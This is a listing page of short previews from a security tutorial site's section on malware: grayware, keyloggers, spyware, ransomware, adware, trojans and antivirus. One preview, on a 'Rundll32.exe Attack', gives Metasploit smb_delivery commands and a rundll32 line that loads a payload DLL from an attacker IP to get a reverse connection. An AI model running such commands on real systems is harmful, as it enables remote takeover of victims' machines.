Found 1009 Articles for Safe & Security

What is Grayware?

PranavBhardwaj
Updated on 20-Apr-2022 09:01:52

1K+ Views

Some malicious programs are not as devastating as Trojans or Virus but still possess danger to the system. Such programs are coined under the term Grayware.In this post, we will know more about Grayware, how it enters your device, and how to prevent it from infiltrating your system.What is Grayware?As its name suggests, Grayware is a software type that comes between malicious(black) and non-malicious(white) software categories. Grayware programs can be used for both legal and illegal activities. For example, Spyware and Keyloggers can be categorized under Grayware. They can be legally used by organizations to track the activities of their ... Read More

What is Keylogger?

PranavBhardwaj
Updated on 20-Apr-2022 08:31:26

2K+ Views

If you suspect everything you type from your keyboard is getting recorded and logged, then there might be a Keylogger present on your device. In this post, we would discuss what Keylogger is and how to prevent it from entering your system.What is Keylogger?Keylogger is a malicious program that is specifically designed to monitor and log the keystrokes made by the user on their keyboards. It is a form of spyware program used by cybercriminals to fetch sensitive information like banking details, login credentials of social media accounts, credit card number, etc. A keylogger can monitor and log such information ... Read More

What is Spyware?

PranavBhardwaj
Updated on 20-Apr-2022 08:07:32

308 Views

Suppose you notice your system is consuming a lot more internet data than usual, and your device is regularly heating up even though you are not using it. In that case, it is possible that a Spyware program is hidden on your system, which is causing such irregularities.In this post, we would discuss more on Spyware and how to get rid of it.What is Spyware?Spyware is a broad category of malware program that infiltrates the user's system without permission to perform various malicious tasks. As its name suggests, Spyware is basically meant for spying on the users and collect their ... Read More

What is Ransomware Attack?

PranavBhardwaj
Updated on 20-Apr-2022 07:53:16

590 Views

If you find that documents, pictures, and other files on your system are automatically renamed by appending an unknown suffix, then it might be because of a Ransomware attack. In this guide, we would discuss in detail what Ransomware is, how it works, and how to prevent Ransomware attacks on your system.What is Ransomware?Ransomware is one of the deadliest malware programs that, after infiltrating the system, lock the files with strong encryption. After encrypting the files, the cybercriminal(s) behind the attack would ask the victim for the ransom in return for an encrypting tool or key.Without the decrypting key or ... Read More

What is Adware?

PranavBhardwaj
Updated on 18-Mar-2021 07:52:57

284 Views

If you are suddenly receiving random ads on your browser and system, it might be because of an Adware infection. This post will guide you on what is Adware, how do you get it, what are its symptoms, and how to protect your device from Adware.What is Adware?Adware is short for advertising-supported software. It is the extension or application responsible for ad displaying on your browser, applications, or system. Generally, Adware enters the system unintentionally, and therefore it comes under Potentially Unwanted Programs or PUP. Since it can conduct various malicious tasks after infiltrating your device, it is also one ... Read More

What is Trojan?

PranavBhardwaj
Updated on 06-Jun-2022 12:07:27

989 Views

In this chapter, we would learn about Trojan in detail. What it is, how it got its name, what are the common types of Trojan, how it works, and how to get rid of it if you encountered one.What is Trojan?The Trojan is a type of malware program or code that presents itself as a useful legitimate program so that users would get fascinated by it and install it. It usually tricks users by using social engineering techniques. Cyberattackers design Trojan to control the system to perform various vicious tasks such as stealing private information & secret files, damage the ... Read More

Types of Malware

PranavBhardwaj
Updated on 20-Apr-2022 06:45:00

2K+ Views

Malware is a term used to describe a computer program responsible for causing a disturbance in your system's working and carrying out other illicit activities. In this chapter, we would learn what the different types of malware are and how they get infiltrated into the system.Types of MalwareBased on the infiltrating nature, attack type, and damage levels, malware are broadly classified into 12 types.1. VirusesThe virus is the oldest Malware type and one of the most common. It is a computer program that, after infiltrating the system, replicate itself by modifying the codes of other programs. It also has the ... Read More

What is Malware?

PranavBhardwaj
Updated on 19-Apr-2022 13:48:23

1K+ Views

If your computer or smartphone has suddenly started misbehaving, then it might be because of a Malware program. In this chapter, we would know what Malware is and what are its common types.What is Malware?The term Malware is a combination of two words Malicious and Software. It is a common term that is used to denote a software or script that is implicitly designed to create damage to any computer, smartphone, IoT devices, Network, and other programable devices. The damage can be anything like hijacking the browser, locking the essential files, degrading the device's performance, and many such.The term Malware was ... Read More

Rundll32.exe Attack

Ajay yadav
Updated on 23-Sep-2020 12:23:33

519 Views

Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0Read More

Difference between Antivirus and Internet Security

Kiran Kumar Panigrahi
Updated on 27-Jul-2022 10:17:32

2K+ Views

Both Internet Security and Antivirus are the techniques that are being used to protect the user from malicious programs by blocking and removing them specifically when the user interacts with external resources.An Antivirus could be defined as an application or software which provides security from the malicious software specifically coming from the Internet. In contrast, Internet Security is a term that is used for a wide range of issues; we can think of it as a collection of Apps designed to protect users from online threats.In this article, we will take a look at the different features of an Antivirus ... Read More

Advertisements